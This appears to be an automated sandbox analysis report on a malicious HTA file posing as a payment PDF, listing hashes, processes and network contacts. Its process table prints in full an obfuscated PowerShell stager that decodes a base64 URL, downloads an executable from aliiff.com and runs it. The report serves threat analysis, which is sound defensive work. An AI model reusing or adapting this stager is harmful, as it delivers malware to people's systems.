File name: | Swift Copyusd180000_pdf.hta |
Full analysis: | https://app.any.run/tasks/9cef94c6-0285-48f8-bb0c-c23c486fde0b |
Verdict: | Malicious activity |
Analysis date: | July 11, 2019, 12:46:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/html |
File info: | HTML document, ASCII text, with very long lines, with CRLF, LF line terminators |
MD5: | 4649EE06E336170FD843122B15C3C0F5 |
SHA1: | E3FA0077A75AA0BAFCEEADA1A7857E99FC2B3BE3 |
SHA256: | 93BA9C1B36188A646B638834E3B323A94B3F8CB037C4399183D77865D4904C70 |
SSDEEP: | 384:xlJTuIXBrLlJTuIXBrVzlJTuIXBrJ9QlJTuIXBrgNsSIdvlJTuIXBrklJTuIXBrr:bJTvXBrJJTvXBrVhJTvXBrJ9EJTvXBro |
.html | | | HyperText Markup Language (100) |
---|
ContentType: | text/html; charset=utf-8 |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3040 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\Swift Copyusd180000_pdf.hta" | C:\Windows\System32\mshta.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2516 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$mogkues = Get-Random -Min 3 -Max 4;$mstfnpdxlqb = ([char[]]([char]97..[char]122));$xdvjgkn = -join ($mstfnpdxlqb | Get-Random -Count $mogkues | % {[Char]$_});$kydajzpsbc = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$oupiezbyv = $xdvjgkn + $kydajzpsbc;$yblvqjnguze=[char]0x53+[char]0x61+[char]0x4c;$qcuiev=[char]0x49+[char]0x45+[char]0x58;$czmajniwr=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jbgnfahpd $yblvqjnguze;$zswbftl=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jbgnfahpd aypskwmvhq $qcuiev;$bcofzydnte=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|aypskwmvhq;jbgnfahpd nrlqzad $czmajniwr;$wirnpmx = $bcofzydnte + [char]0x5c + $oupiezbyv;$uyhdokji = $xdvjgkn + '';$stzeijykhof = '';$stzeijykhof = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($stzeijykhof));$tewfaxgz = $env:PUBLIC + [char]0x5c + $uyhdokji;$zswbftl=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;$suhvylewt = New-Object $zswbftl;try{$kfdteubny = $suhvylewt.DownloadData($stzeijykhof)}catch{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kfdteubny = $suhvylewt.DownloadData($stzeijykhof)};[IO.File]::WriteAllBytes($tewfaxgz, $kfdteubny);nrlqzad $tewfaxgz;;;;$nwmicpveoh = 'aHR0cDovL2FsaWlmZi5jb20vYXBwL3dlYnJvb3QvZGF0ZS9pbmsuZXhl';$nwmicpveoh=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($nwmicpveoh));$xbdakwmf = New-Object $zswbftl;$vgiobrhu = $xbdakwmf.DownloadData($nwmicpveoh);[IO.File]::WriteAllBytes($wirnpmx, $vgiobrhu);nrlqzad $wirnpmx;;$uhapsnvxky = @($hlrov, $fyokgwdp, $vtlxc, $tnurqdxfeg);foreach($hwvxok in $uhapsnvxky){$null = $_}"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YB194TTTOK9865FEGLT6.temp | — | |
MD5:— | SHA256:— | |||
2516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 | |||
2516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF166c2c.TMP | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2516 | powershell.exe | 95.168.186.145:80 | aliiff.com | — | NL | suspicious |
Domain | IP | Reputation |
---|---|---|
aliiff.com |
| suspicious |